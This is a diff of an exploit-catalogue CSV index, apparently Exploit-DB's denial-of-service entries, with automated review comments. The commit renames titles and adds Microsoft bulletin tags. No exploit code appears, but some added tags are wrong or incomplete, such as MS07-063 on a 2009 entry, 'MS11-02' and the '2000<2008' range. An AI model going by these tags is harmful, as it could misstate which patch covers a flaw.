diff --git a/files.csv b/files.csv
index 4179a1f3e..b5d2ac495 100755
--- a/files.csv
+++ b/files.csv
@@ -16,7 +16,7 @@ id,file,description,date,author,platform,type,port
 82,platforms/windows/dos/82.c,"Piolet Client 1.05 - Remote Denial of Service",2003-08-20,"Luca Ercoli",windows,dos,0
 94,platforms/multiple/dos/94.c,"MyServer 0.4.3 - Denial of Service",2003-09-08,badpack3t,multiple,dos,80
 111,platforms/windows/dos/111.c,"Microsoft Windows Messenger Service - Denial of Service (MS03-043)",2003-10-18,LSD-PLaNET,windows,dos,0
-113,platforms/windows/dos/113.pl,"Microsoft Exchange 2000 - XEXCH50 Heap Overflow PoC (MS03-046)",2003-10-22,"H D Moore",windows,dos,0
+113,platforms/windows/dos/113.pl,"Microsoft Exchange Server 2000 - XEXCH50 Heap Overflow PoC (MS03-046)",2003-10-22,"H D Moore",windows,dos,0
 115,platforms/linux/dos/115.c,"WU-FTPD 2.6.2 - 'wuftpd-freezer.c' Remote Denial of Service",2003-10-31,"Angelo Rosiello",linux,dos,0
 146,platforms/multiple/dos/146.c,"OpenSSL ASN.1 <= 0.9.6j / 0.9.7b - Brute Forcer for Parsing Bugs",2003-10-09,"Bram Matthys",multiple,dos,0
 147,platforms/windows/dos/147.c,"Need for Speed 2 - Remote Client Buffer Overflow",2004-01-23,"Luigi Auriemma",windows,dos,0
@@ -28,7 +28,7 @@ id,file,description,date,author,platform,type,port
 185,platforms/linux/dos/185.sh,"Slackware Linux - /usr/bin/ppp-off Insecure /tmp Call Exploit",2000-11-17,sinfony,linux,dos,0
 195,platforms/hp-ux/dos/195.sh,"HP-UX 11.00/10.20 crontab - Overwrite Files Exploit",2000-11-19,dubhe,hp-ux,dos,0
 212,platforms/hp-ux/dos/212.c,"HP-UX FTPD - Remote Buffer Overflow",2000-12-01,venglin,hp-ux,dos,0
-214,platforms/windows/dos/214.c,"Microsoft Windows - 'Jolt2.c' Denial of Service",2000-12-02,phonix,windows,dos,0
+214,platforms/windows/dos/214.c,"Microsoft Windows - 'Jolt2.c' Denial of Service (MS00-029)",2000-12-02,phonix,windows,dos,0
 233,platforms/windows/dos/233.pl,"Solaris 2.7 / 2.8 Catman - Local Insecure tmp Symlink Exploit",2000-12-19,"Shane Hird",windows,dos,0
 235,platforms/solaris/dos/235.pl,"SunOS 5.7 Catman - Local Insecure tmp Symlink Clobber Exploit",2000-12-20,lwc,solaris,dos,0
 236,platforms/linux/dos/236.sh,"RedHat 6.1 / 6.2 - TTY Flood Users Exploit",2001-01-02,teleh0r,linux,dos,0
@@ -162,7 +162,7 @@ id,file,description,date,author,platform,type,port
 941,platforms/windows/dos/941.c,"Yager 5.24 - Multiple Denial of Service",2005-04-14,"Luigi Auriemma",windows,dos,0
 942,platforms/windows/dos/942.c,"Microsoft Windows - Malformed IP Options Denial of Service (MS05-019)",2005-04-17,"Yuri Gushin",windows,dos,0
 946,platforms/multiple/dos/946.c,"PostgreSQL 8.01 - Remote Reboot Denial of Service",2005-04-19,ChoiX,multiple,dos,0
-948,platforms/multiple/dos/948.c,"Multiple OS (Win32/Aix/Cisco) - Crafted ICMP Messages Denial of Service",2005-04-20,houseofdabus,multiple,dos,0
+948,platforms/multiple/dos/948.c,"Multiple OS (Win32/Aix/Cisco) - Crafted ICMP Messages Denial of Service (MS05-019)",2005-04-20,houseofdabus,multiple,dos,0
 956,platforms/multiple/dos/956.c,"Ethereal 0.10.10 / tcpdump 3.9.1 - (rsvp_print) Infinite Loop Denial of Service",2005-04-26,vade79,multiple,dos,0
 957,platforms/linux/dos/957.c,"Tcpdump 3.8.x - (ldp_print) Infinite Loop Denial of Service",2005-04-26,vade79,linux,dos,0
 958,platforms/linux/dos/958.c,"Tcpdump 3.8.x - (rt_routing_info) Infinite Loop Denial of Service",2005-04-26,vade79,linux,dos,0
@@ -215,7 +215,7 @@ id,file,description,date,author,platform,type,port
 1165,platforms/windows/dos/1165.pl,"Inframail Advantage Server Edition 6.0 <= 6.37 - (SMTP) Buffer Overflow",2005-06-27,"Reed Arvin",windows,dos,0
 1166,platforms/windows/dos/1166.pl,"Inframail Advantage Server Edition 6.0 <= 6.37 - (FTP) Buffer Overflow",2005-06-27,"Reed Arvin",windows,dos,0
 1175,platforms/cgi/dos/1175.pl,"GTChat 0.95 Alpha - (adduser) Remote Denial of Service",2005-08-23,VTECin5th,cgi,dos,0
-1176,platforms/multiple/dos/1176.c,"Ventrilo 2.3.0 - Remote Denial of Service (All Platforms)",2005-08-23,"Luigi Auriemma",multiple,dos,0
+1176,platforms/multiple/dos/1176.c,"Ventrilo 2.3.0 (All Platforms) - Remote Denial of Service",2005-08-23,"Luigi Auriemma",multiple,dos,0
 1192,platforms/windows/dos/1192.cpp,"P2P Pro 1.0 - (command) Denial of Service",2005-09-02,basher13,windows,dos,0
 1196,platforms/linux/dos/1196.c,"CUPS Server 1.1 - GET Request Denial of Service",2005-09-05,tracewar,linux,dos,0
 1199,platforms/windows/dos/1199.c,"BNBT BitTorrent EasyTracker 7.7r3 - Denial of Service",2005-09-06,Sowhat,windows,dos,0
@@ -299,9 +299,9 @@ id,file,description,date,author,platform,type,port
 1573,platforms/php/dos/1573.php,"Guppy 4.5.11 - (Delete Databases) Remote Denial of Service",2006-03-10,trueend5,php,dos,0
 1593,platforms/windows/dos/1593.c,"Mercur MailServer 5.0 SP3 - (IMAP) Denial of Service",2006-03-19,Omni,windows,dos,0
 1598,platforms/windows/dos/1598.html,"Microsoft Internet Explorer 6 - (script action handlers) 'mshtml.dll' Denial of Service",2006-03-21,"Michal Zalewski",windows,dos,0
-1599,platforms/windows/dos/1599.cpp,"Microsoft Windows 2003/XP - (IGMP v3) Denial of Service (MS06-007) (1)",2006-03-21,"Alexey Sintsov",windows,dos,0
+1599,platforms/windows/dos/1599.cpp,"Microsoft Windows Server 2003/XP - (IGMP v3) Denial of Service (MS06-007) (1)",2006-03-21,"Alexey Sintsov",windows,dos,0
 1601,platforms/windows/dos/1601.c,"ASP.NET w3wp - (COM Components) Remote Crash",2006-03-22,"Debasis Mohanty",windows,dos,0
-1603,platforms/windows/dos/1603.c,"Microsoft Windows 2003/XP - (IGMP v3) Denial of Service (MS06-007) (2)",2006-03-22,Firestorm,windows,dos,0
+1603,platforms/windows/dos/1603.c,"Microsoft Windows Server 2003/XP - (IGMP v3) Denial of Service (MS06-007) (2)",2006-03-22,Firestorm,windows,dos,0
 1604,platforms/windows/dos/1604.html,"Microsoft Internet Explorer 6 - 'mshtml.dll checkbox' Crash",2006-03-22,"Stelian Ene",windows,dos,0
 1613,platforms/windows/dos/1613.c,"Vavoom 1.19.1 - Multiple Vulnerabilities/Denial of Service",2006-03-26,"Luigi Auriemma",windows,dos,0
 1614,platforms/windows/dos/1614.c,"csDoom 0.7 - Multiple Vulnerabilities/Denial of Service",2006-03-26,"Luigi Auriemma",windows,dos,0
@@ -816,7 +816,7 @@ id,file,description,date,author,platform,type,port
 6658,platforms/windows/dos/6658.txt,"VBA32 Personal AntiVirus 3.12.8.x - (malformed archive) Denial of Service",2008-10-03,LiquidWorm,windows,dos,0
 6660,platforms/windows/dos/6660.txt,"Serv-U FTP Server 7.3 - Authenticated (stou con:1) Denial of Service",2008-10-03,dmnt,windows,dos,0
 6668,platforms/windows/dos/6668.txt,"AyeView 2.20 - (malformed gif image) Local Crash",2008-10-04,suN8Hclf,windows,dos,0
-6671,platforms/windows/dos/6671.c,"Microsoft Windows Vista - Access Violation from Limited Account Exploit (BSoD)",2008-10-04,Defsanguje,windows,dos,0
+6671,platforms/windows/dos/6671.c,"Microsoft Windows Vista - Access Violation from Limited Account Exploit (Blue Screen of Death)",2008-10-04,Defsanguje,windows,dos,0
 6672,platforms/windows/dos/6672.txt,"AyeView 2.20 - (invalid bitmap header parsing) Crash",2008-10-05,suN8Hclf,windows,dos,0
 6673,platforms/windows/dos/6673.txt,"FastStone Image Viewer 3.6 - (malformed bmp image) Crash",2008-10-05,suN8Hclf,windows,dos,0
 6689,platforms/linux/dos/6689.txt,"Konqueror 3.5.9 - (font color) Remote Crash",2008-10-06,"Jeremy Brown",linux,dos,0
@@ -1148,7 +1148,7 @@ id,file,description,date,author,platform,type,port
 9393,platforms/windows/dos/9393.pl,"FoxPlayer 1.1.0 - '.m3u' Local Buffer Overflow (PoC)",2009-08-07,"opt!x hacker",windows,dos,0
 9401,platforms/windows/dos/9401.py,"SpiceWorks 3.6 - Accept Parameter Overflow Crash",2009-08-07,"David Kennedy (ReL1K)",windows,dos,0
 9411,platforms/windows/dos/9411.cpp,"Embedthis Appweb 3.0b.2-4 - Remote Buffer Overflow (PoC)",2009-08-11,"fl0 fl0w",windows,dos,0
-9417,platforms/windows/dos/9417.txt,"Microsoft Windows 2003 - '.EOT' BSOD Crash",2009-08-11,webDEViL,windows,dos,0
+9417,platforms/windows/dos/9417.txt,"Microsoft Windows 2003 - '.EOT' Blue Screen of Death Crash",2009-08-11,webDEViL,windows,dos,0
 9423,platforms/windows/dos/9423.pl,"Microsoft Wordpad on winXP SP3 - Local Crash",2009-08-12,murderkey,windows,dos,0
 9427,platforms/windows/dos/9427.py,"VideoLAN VLC Media Player 1.0.0/1.0.1 - 'smb://' URI Handling Buffer Overflow (PoC)",2009-08-13,Dr_IDE,windows,dos,0
 9429,platforms/windows/dos/9429.py,"EmbedThis Appweb 3.0B.2-4 - Multiple Remote Buffer Overflow (PoC)",2009-08-13,Dr_IDE,windows,dos,0
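Review bot: The new title for entry 9417 keeps `Microsoft Windows 2003`, while the same commit renames entries 1599 and 1603 to `Microsoft Windows Server 2003/XP`. Titles in this index are matched by product string when people look up what affects a given host, so the two spellings of one product will split those results. For consistency I would write `"Microsoft Windows Server 2003 - '.EOT' Blue Screen of Death Crash"`. The added title for entry 12273 (`7/2008R2`) has the same mixed naming and could be aligned in the same pass.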
@@ -1181,7 +1181,7 @@ id,file,description,date,author,platform,type,port
 9584,platforms/windows/dos/9584.txt,"PPstream 2.6.86.8900 - PPSMediaList ActiveX Remote Buffer Overflow PoC (1)",2009-09-03,"expose 0day",windows,dos,0
 9585,platforms/windows/dos/9585.txt,"PPstream 2.6.86.8900 - PPSMediaList ActiveX Remote Buffer Overflow PoC (2)",2009-09-03,"expose 0day",windows,dos,0
 9587,platforms/windows/dos/9587.txt,"Microsoft IIS 5.0/6.0 FTP Server - (Stack Exhaustion) Denial of Service",2009-09-04,kingcope,windows,dos,0
-9594,platforms/windows/dos/9594.txt,"Microsoft Windows Vista/7 - SMB2.0 Negotiate Protocol Request Remote BSOD",2009-09-09,"laurent gaffie",windows,dos,0
+9594,platforms/windows/dos/9594.txt,"Microsoft Windows Vista/7 - SMB2.0 Negotiate Protocol Request Remote Blue Screen of Death (MS07-063)",2009-09-09,"laurent gaffie",windows,dos,0
 9597,platforms/windows/dos/9597.txt,"Novell eDirectory 8.8 SP5 - Remote Denial of Service",2009-09-09,karak0rsan,windows,dos,0
 9606,platforms/windows/dos/9606.pl,"Apple Safari 3.2.3 (Windows x86) - JavaScript (eval) Remote Denial of Service",2009-09-09,"Jeremy Brown",windows,dos,0
 9607,platforms/windows/dos/9607.pl,"Ipswitch WS_FTP 12 Professional - Remote Format String (PoC)",2009-09-09,"Jeremy Brown",windows,dos,0
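Review bot: The bulletin tag added to entry 9594 does not fit the rest of the row: `MS07-063` is a 2007 bulletin number, but the entry is dated 2009-09-09 and its title names Windows 7. A defender who uses this tag to decide whether a host is patched would check the wrong update and could mark an exposed system as covered. Please confirm the identifier against Microsoft's bulletin index before merging. If it cannot be confirmed, keep the expanded wording without a tag, `"... SMB2.0 Negotiate Protocol Request Remote Blue Screen of Death"`.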
@@ -1235,7 +1235,7 @@ id,file,description,date,author,platform,type,port
 10017,platforms/linux/dos/10017.c,"Linux Kernel 2.6.x - 'fput()' Null Pointer Dereference Local Denial of Service",2009-11-09,"David Howells",linux,dos,0
 10022,platforms/linux/dos/10022.c,"Linux Kernel 2.6.31.4 - 'unix_stream_connect()' Local Denial of Service",2009-11-10,"Tomoki Sekiyama",linux,dos,0
 10062,platforms/windows/dos/10062.py,"Novell eDirectory 883ftf3 - nldap module Denial of Service",2009-11-16,ryujin,windows,dos,389
-10068,platforms/windows/dos/10068.rb,"Microsoft Windows 2000-2008 - Embedded OpenType Font Engine Remote Code Execution (Metasploit)",2009-11-12,"H D Moore",windows,dos,0
+10068,platforms/windows/dos/10068.rb,"Microsoft Windows 2000<2008 - Embedded OpenType Font Engine Remote Code Execution (MS09-065) (Metasploit)",2009-11-12,"H D Moore",windows,dos,0
 10073,platforms/windows/dos/10073.py,"XM Easy Personal FTP 5.8 - Denial of Service",2009-10-02,PLATEN,windows,dos,21
 10077,platforms/multiple/dos/10077.txt,"OpenLDAP 2.3.39 - MODRDN Remote Denial of Service",2009-11-09,"Ralf Haferkamp",multiple,dos,389
 33476,platforms/hardware/dos/33476.pl,"Juniper Networks JUNOS 7.1.1 - Malformed TCP Packet Denial of Service and Unspecified Vulnerabilities",2010-01-07,anonymous,hardware,dos,0
@@ -1461,7 +1461,7 @@ id,file,description,date,author,platform,type,port
 12000,platforms/windows/dos/12000.pl,"Kwik Pay Payroll 4.10.3 - '.mdb' Crash (PoC)",2010-04-01,anonymous,windows,dos,0
 12001,platforms/windows/dos/12001.pl,"Kwik Pay Payroll 4.10.3 - '.zip' Denial of Service",2010-04-01,anonymous,windows,dos,0
 12010,platforms/windows/dos/12010.pl,"uTorrent WebUI 0.370 - Authorisation Header Denial of Service",2010-04-02,"zombiefx darkernet",windows,dos,0
-12011,platforms/windows/dos/12011.txt,"Google Chrome 4.1 - OOB Array Indexing",2010-04-02,"Tobias Klein",windows,dos,0
+12011,platforms/windows/dos/12011.txt,"Google Chrome 4.1 - Out-of-Bounds Array Indexing",2010-04-02,"Tobias Klein",windows,dos,0
 12025,platforms/windows/dos/12025.php,"Dualis 20.4 - '.bin' Local Denial of Service",2010-04-03,"Yakir Wizman",windows,dos,0
 12027,platforms/windows/dos/12027.py,"DSEmu 0.4.10 - '.nds' Local Crash",2010-04-03,l3D,windows,dos,0
 12030,platforms/windows/dos/12030.html,"IncrediMail 2.0 - ActiveX (Authenticate) Buffer Overflow (PoC)",2010-04-03,d3b4g,windows,dos,0
@@ -1498,7 +1498,7 @@ id,file,description,date,author,platform,type,port
 12252,platforms/hardware/dos/12252.txt,"IBM Bladecenter Management Module - Denial of Service",2010-04-15,"Alexey Sintsov",hardware,dos,0
 12258,platforms/windows/dos/12258.py,"Microsoft Windows - SMB Client-Side Bug PoC (MS10-006)",2010-04-16,"laurent gaffie",windows,dos,0
 12259,platforms/php/dos/12259.php,"PHP 5.3.x - Denial of Service",2010-04-16,ITSecTeam,php,dos,0
-12273,platforms/windows/dos/12273.py,"Microsoft Windows 7/2008R2 - SMB Client Trans2 Stack Overflow 10-020 (PoC)",2010-04-17,"laurent gaffie",windows,dos,0
+12273,platforms/windows/dos/12273.py,"Microsoft Windows 7/2008R2 - SMB Client Trans2 Stack Overflow (MS10-020) (PoC)",2010-04-17,"laurent gaffie",windows,dos,0
 12274,platforms/windows/dos/12274.py,"Multiple Vendor AgentX++ - Stack Buffer Overflow",2010-04-17,ZSploit.com,windows,dos,0
 12294,platforms/windows/dos/12294.txt,"avtech software 'avc781viewer.dll' ActiveX - Multiple Vulnerabilities",2010-04-19,LiquidWorm,windows,dos,0
 12297,platforms/hardware/dos/12297.txt,"Huawei EchoLife HG520c - Denial of Service / Modem Reset",2010-04-19,hkm,hardware,dos,0
@@ -1510,7 +1510,7 @@ id,file,description,date,author,platform,type,port
 12337,platforms/windows/dos/12337.c,"Microsoft Windows 2000/XP/2003 - 'win32k.sys' SfnINSTRING Local kernel Denial of Service",2010-04-22,MJ0011,windows,dos,0
 12341,platforms/windows/dos/12341.txt,"EDraw Flowchart ActiveX Control 2.3 - (EDImage.ocx) Remote Denial of Service (IE)",2010-04-22,LiquidWorm,windows,dos,0
 12344,platforms/hardware/dos/12344.txt,"Apple iPhone 3.1.2 - (7D11) Model MB702LL Mobile Safari Denial of Service",2010-04-19,"Matthew Bergin",hardware,dos,0
-12356,platforms/windows/dos/12356.c,"CommView 6.1 (Build 636) - Local Denial of Service (BSOD)",2010-04-23,p4r4N0ID,windows,dos,0
+12356,platforms/windows/dos/12356.c,"CommView 6.1 (Build 636) - Local Denial of Service (Blue Screen of Death)",2010-04-23,p4r4N0ID,windows,dos,0
 12375,platforms/osx/dos/12375.c,"Apple Mac OSX 10.6 - HFS File System Attack (Denial of Service)",2010-04-24,"Maksymilian Arciemowicz",osx,dos,0
 12382,platforms/multiple/dos/12382.txt,"Invision Power Board - Denial of Service",2010-04-25,SeeMe,multiple,dos,0
 12401,platforms/multiple/dos/12401.html,"WebKit 532.5 - Stack Exhaustion",2010-04-26,"Mathias Karlsson",multiple,dos,0
@@ -1655,7 +1655,7 @@ id,file,description,date,author,platform,type,port
 14601,platforms/windows/dos/14601.py,"Rosoft media player 4.4.4 - Buffer Overflow (SEH) (PoC)",2010-08-10,anonymous,windows,dos,0
 14607,platforms/windows/dos/14607.py,"Microsoft - SMB Server Trans2 Zero Size Pool Alloc (MS10-054)",2010-08-10,"laurent gaffie",windows,dos,0
 14608,platforms/windows/dos/14608.txt,"Microsoft Windows - CreateWindow Function Callback (MS10-048)",2010-08-10,"Core Security",windows,dos,0
-14609,platforms/windows/dos/14609.py,"Msxml2.XMLHTTP.3.0 - Response Handling Memory Corruption (MS10-051)",2010-08-10,Skylined,windows,dos,0
+14609,platforms/windows/dos/14609.py,"Microsoft Msxml2.XMLHTTP.3.0 - Response Handling Memory Corruption (MS10-051)",2010-08-10,Skylined,windows,dos,0
 14611,platforms/windows/dos/14611.c,"Microsoft Windows - 'SfnLOGONNOTIFY' Privilege Escalation (MS10-048)",2010-08-10,MJ0011,windows,dos,0
 14613,platforms/windows/dos/14613.py,"Microsoft Windows Live Messenger 14.0.8117 - Animation Remote Denial of Service",2010-08-11,TheLeader,windows,dos,0
 14620,platforms/windows/dos/14620.py,"RightMark Audio Analyzer 6.2.3 - Denial of Service",2010-08-11,"Oh Yaw Theng",windows,dos,0
@@ -1724,7 +1724,7 @@ id,file,description,date,author,platform,type,port
 15062,platforms/linux/dos/15062.txt,"RarCrack 0.2 - 'Filename' init() .bss (PoC)",2010-09-20,Stoke,linux,dos,0
 15065,platforms/windows/dos/15065.txt,"Microsoft Excel - WOPT Record Parsing Heap Memory Corruption",2010-09-21,Abysssec,windows,dos,0
 15076,platforms/windows/dos/15076.py,"Adobe Shockwave Director tSAC - Chunk Memory Corruption",2010-09-22,Abysssec,windows,dos,0
-15112,platforms/windows/dos/15112.py,"Microsoft Cinepak Codec CVDecompress - Heap Overflow",2010-09-26,Abysssec,windows,dos,0
+15112,platforms/windows/dos/15112.py,"Microsoft Cinepak Codec CVDecompress - Heap Overflow (MS10-055)",2010-09-26,Abysssec,windows,dos,0
 15086,platforms/multiple/dos/15086.py,"Adobe Acrobat Reader and Flash - 'newfunction' Remote Code Execution",2010-09-23,Abysssec,multiple,dos,0
 15088,platforms/windows/dos/15088.txt,"Microsoft Excel - HFPicture Record Parsing Memory Corruption",2010-09-23,Abysssec,windows,dos,0
 15096,platforms/windows/dos/15096.py,"Microsoft MPEG Layer-3 Audio Decoder - Division By Zero",2010-09-24,Abysssec,windows,dos,0
@@ -1733,7 +1733,7 @@ id,file,description,date,author,platform,type,port
 15122,platforms/windows/dos/15122.html,"Microsoft Internet Explorer - MSHTML Findtext Processing Issue",2010-09-27,Abysssec,windows,dos,0
 15131,platforms/windows/dos/15131.txt,"Fox Audio Player 0.8.0 - '.m3u' Denial of Service",2010-09-27,4n0nym0us,windows,dos,0
 15148,platforms/windows/dos/15148.txt,"Microsoft Excel - SxView Record Parsing Heap Memory Corruption",2010-09-29,Abysssec,windows,dos,0
-15158,platforms/windows/dos/15158.py,"Microsoft Unicode Scripts Processor - Remote Code Execution",2010-09-30,Abysssec,windows,dos,0
+15158,platforms/windows/dos/15158.py,"Microsoft Unicode Scripts Processor - Remote Code Execution (MS10-063)",2010-09-30,Abysssec,windows,dos,0
 15167,platforms/windows/dos/15167.txt,"Microsoft IIS 6.0 - ASP Stack Overflow (Stack Exhaustion) Denial of Service (MS10-065)",2010-10-01,kingcope,windows,dos,0
 15188,platforms/ios/dos/15188.py,"iOS FileApp < 2.0 - FTP Remote Denial of Service",2010-10-02,m0ebiusc0de,ios,dos,0
 15212,platforms/osx/dos/15212.txt,"Adobe Acrobat and Reader - Array Indexing Remote Code Execution",2010-10-06,"Knud and nSense",osx,dos,0
@@ -1752,7 +1752,7 @@ id,file,description,date,author,platform,type,port
 15259,platforms/windows/dos/15259.txt,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - Buffer Overflow",2010-10-15,"Luigi Auriemma",windows,dos,0
 15260,platforms/windows/dos/15260.txt,"Rocket Software UniData 7.2.7.3806 - Denial of Service",2010-10-15,"Luigi Auriemma",windows,dos,0
 15261,platforms/multiple/dos/15261.txt,"IBM solidDB 6.5.0.3 - Denial of Service",2010-10-15,"Luigi Auriemma",multiple,dos,0
-15262,platforms/windows/dos/15262.txt,"Microsoft Office - HtmlDlgHelper Class Memory Corruption",2010-10-16,"Core Security",windows,dos,0
+15262,platforms/windows/dos/15262.txt,"Microsoft Office - HtmlDlgHelper Class Memory Corruption (MS10-071)",2010-10-16,"Core Security",windows,dos,0
 15267,platforms/windows/dos/15267.py,"Novel eDirectory DHost Console 8.8 SP3 - Local Overwrite (SEH)",2010-10-17,d0lc3,windows,dos,0
 15273,platforms/multiple/dos/15273.txt,"Opera 10.63 - SVG Animation Element Denial of Service",2010-10-17,fla,multiple,dos,0
 15283,platforms/windows/dos/15283.txt,"Hanso Converter 1.4.0 - '.ogg' Denial of Service",2010-10-19,anT!-Tr0J4n,windows,dos,0
@@ -1905,7 +1905,7 @@ id,file,description,date,author,platform,type,port
 16263,platforms/linux/dos/16263.c,"Linux Kernel 2.6.37 - Local Kernel Denial of Service (1)",2011-03-02,prdelka,linux,dos,0
 16270,platforms/linux/dos/16270.c,"vsftpd 2.3.2 - Denial of Service",2011-03-02,"Maksymilian Arciemowicz",linux,dos,0
 16284,platforms/unix/dos/16284.rb,"Subversion - Date Svnserve (Metasploit)",2010-08-07,Metasploit,unix,dos,0
-16365,platforms/windows/dos/16365.rb,"Microsoft Plug and Play Service - Overflow Exploit (Metasploit)",2010-08-30,Metasploit,windows,dos,0
+16365,platforms/windows/dos/16365.rb,"Microsoft Plug and Play Service - Overflow Exploit (MS05-039) (Metasploit)",2010-08-30,Metasploit,windows,dos,0
 16657,platforms/aix/dos/16657.rb,"PointDev IDEAL Migration - Buffer Overflow (Metasploit)",2010-09-25,Metasploit,aix,dos,0
 16790,platforms/windows/dos/16790.rb,"PSOProxy 0.91 - Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,dos,8080
 16929,platforms/aix/dos/16929.rb,"AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,aix,dos,0
@@ -1952,7 +1952,7 @@ id,file,description,date,author,platform,type,port
 17188,platforms/windows/dos/17188.txt,"IBM Tivoli Directory Server SASL - Bind Request Remote Code Execution",2011-04-19,"Francis Provencher",windows,dos,0
 17201,platforms/multiple/dos/17201.php,"PHP phar extension 1.1.1 - Heap Overflow",2011-04-22,"Alexander Gavrun",multiple,dos,0
 17222,platforms/linux/dos/17222.c,"Libmodplug 0.8.8.2 - '.abc' Stack Based Buffer Overflow (PoC)",2011-04-28,epiphant,linux,dos,0
-17227,platforms/windows/dos/17227.py,"Microsoft Excel - Axis Properties Record Parsing Buffer Overflow (PoC)",2011-04-29,webDEViL,windows,dos,0
+17227,platforms/windows/dos/17227.py,"Microsoft Excel - Axis Properties Record Parsing Buffer Overflow (PoC) (MS11-02)",2011-04-29,webDEViL,windows,dos,0
 17266,platforms/windows/dos/17266.txt,"serva32 1.2.00 rc1 - Multiple Vulnerabilities",2011-05-10,"AutoSec Tools",windows,dos,0
 17278,platforms/windows/dos/17278.pl,"Adobe Audition 3.0 build 7283 - Session File Handling Buffer Overflow (PoC)",2011-05-13,LiquidWorm,windows,dos,0
 17273,platforms/windows/dos/17273.c,"Symantec Backup Exec System Recovery 8.5 - Kernel Pointers Dereferences",2011-05-12,"Stefan LE BERRE",windows,dos,0
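Review bot: The tag `(MS11-02)` added to entry 17227 is not a complete bulletin identifier; every other tag in this diff has three digits after the hyphen (`MS11-035`, `MS11-047`, `MS11-077`), so a digit appears to have been lost. As written it matches no bulletin, and a prefix search on it would hit several unrelated ones, so the entry cannot be tied to a patch. The tag is also placed after `(PoC)`, whereas the new title for entry 12273 puts the bulletin before `(PoC)`. Suggested form, with NNN replaced by the confirmed number: `"Microsoft Excel - Axis Properties Record Parsing Buffer Overflow (MS11-NNN) (PoC)"`.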
@@ -1972,7 +1972,7 @@ id,file,description,date,author,platform,type,port
 17398,platforms/windows/dos/17398.txt,"Microsoft Windows Media Player with K-Lite Codec Pack - Denial of Service (PoC)",2011-06-14,"Nicolas Krassas",windows,dos,0
 17399,platforms/windows/dos/17399.txt,"Microsoft Office XP - Remote code Execution",2011-06-14,"Francis Provencher",windows,dos,0
 17400,platforms/linux/dos/17400.c,"Conky Linux 1.8.0 - Local Denial of Service (PoC)",2011-06-14,"Arturo D'Elia",linux,dos,0
-17401,platforms/windows/dos/17401.txt,"Microsoft HyperV - Persistent Denial of Service",2011-06-14,"Core Security",windows,dos,0
+17401,platforms/windows/dos/17401.txt,"Microsoft HyperV - Persistent Denial of Service (MS11-047)",2011-06-14,"Core Security",windows,dos,0
 17405,platforms/windows/dos/17405.txt,"Adobe Reader/Acrobat 10.0.1 - Denial of Service",2011-06-16,"Soroush Dalili",windows,dos,0
 17421,platforms/windows/dos/17421.py,"XnView 1.98 - Denial of Service (PoC)",2011-06-20,BraniX,windows,dos,0
 17458,platforms/windows/dos/17458.txt,"HP Data Protector 6.20 - Multiple Vulnerabilities",2011-06-29,"Core Security",windows,dos,0
@@ -2009,14 +2009,14 @@ id,file,description,date,author,platform,type,port
 17772,platforms/windows/dos/17772.txt,"BroadWin Webaccess Client - Multiple Vulnerabilities",2011-09-02,"Luigi Auriemma",windows,dos,0
 17781,platforms/windows/dos/17781.pl,"World Of Warcraft - 'chat-cache.txt' Local Stack Overflow Denial of Service",2011-09-05,"BSOD Digital",windows,dos,0
 17785,platforms/windows/dos/17785.pl,"TOWeb 3.0 - Local Format String Denial of Service (TOWeb.MO file Corruption)",2011-09-05,"BSOD Digital",windows,dos,0
-17795,platforms/windows/dos/17795.py,"Crush FTP 5 - 'APPE' command Remote JVM BSOD (PoC)",2011-09-07,"BSOD Digital",windows,dos,0
+17795,platforms/windows/dos/17795.py,"Crush FTP 5 - 'APPE' command Remote JVM Blue Screen of Death (PoC)",2011-09-07,"BSOD Digital",windows,dos,0
 17796,platforms/windows/dos/17796.txt,"Microsoft Windows Server 2008 R1 - Local Denial of Service",2011-09-07,Randomdude,windows,dos,0
 21788,platforms/windows/dos/21788.pl,"FastStone Image Viewer 4.6 - ReadAVonIP Crash (PoC)",2012-10-07,"Jean Pascal Pereira",windows,dos,0
 17806,platforms/linux/dos/17806.txt,"FTP Client (Ubuntu 11.04) - Local Buffer Overflow Crash (PoC)",2011-09-08,localh0t,linux,dos,0
 17815,platforms/windows/dos/17815.py,"MelOn Player 1.0.11.x - Denial of Service (PoC)",2011-09-09,modpr0be,windows,dos,0
 21785,platforms/windows/dos/21785.pl,"HCView - WriteAV Crash (PoC)",2012-10-07,"Jean Pascal Pereira",windows,dos,0
-17830,platforms/windows/dos/17830.txt,"Microsoft WINS Service 5.2.3790.4520 - Memory Corruption",2011-09-13,"Luigi Auriemma",windows,dos,0
-17831,platforms/windows/dos/17831.txt,"Microsoft WINS - ECommEndDlg Input Validation Error",2011-09-13,"Core Security",windows,dos,0
+17830,platforms/windows/dos/17830.txt,"Microsoft WINS Service 5.2.3790.4520 - Memory Corruption (MS11-035)",2011-09-13,"Luigi Auriemma",windows,dos,0
+17831,platforms/windows/dos/17831.txt,"Microsoft WINS - ECommEndDlg Input Validation Error (MS11-035/MS11-070)",2011-09-13,"Core Security",windows,dos,0
 17835,platforms/windows/dos/17835.txt,"Beckhoff TwinCAT 2.11.0.2004 - Denial of Service",2011-09-14,"Luigi Auriemma",windows,dos,0
 17836,platforms/windows/dos/17836.txt,"Equis MetaStock 11 - Use-After-Free",2011-09-14,"Luigi Auriemma",windows,dos,0
 17837,platforms/windows/dos/17837.txt,"eSignal and eSignal Pro 10.6.2425.1208 - Multiple Vulnerabilities",2011-09-14,"Luigi Auriemma",windows,dos,0
@@ -2056,7 +2056,7 @@ id,file,description,date,author,platform,type,port
 18017,platforms/windows/dos/18017.py,"Cyclope Internet Filtering Proxy 4.0 - CEPMServer.exe Denial of Service (PoC)",2011-10-21,loneferret,windows,dos,0
 18019,platforms/windows/dos/18019.txt,"Google Chrome - Killing Thread (PoC)",2011-10-22,pigtail23,windows,dos,0
 18023,platforms/php/dos/18023.java,"phpLDAPadmin 0.9.4b - Denial of Service",2011-10-23,Alguien,php,dos,0
-18024,platforms/windows/dos/18024.txt,"Win32k - Null Pointer De-reference PoC (MS11-077)",2011-10-23,KiDebug,windows,dos,0
+18024,platforms/windows/dos/18024.txt,"Microsoft Win32k - Null Pointer De-reference PoC (MS11-077)",2011-10-23,KiDebug,windows,dos,0
 18025,platforms/multiple/dos/18025.txt,"Google Chrome - Denial of Service",2011-10-23,"Prashant Uniyal",multiple,dos,0
 18043,platforms/windows/dos/18043.py,"GFI Faxmaker Fax Viewer 10.0 (build 237) - Denial of Service (PoC)",2011-10-28,loneferret,windows,dos,0
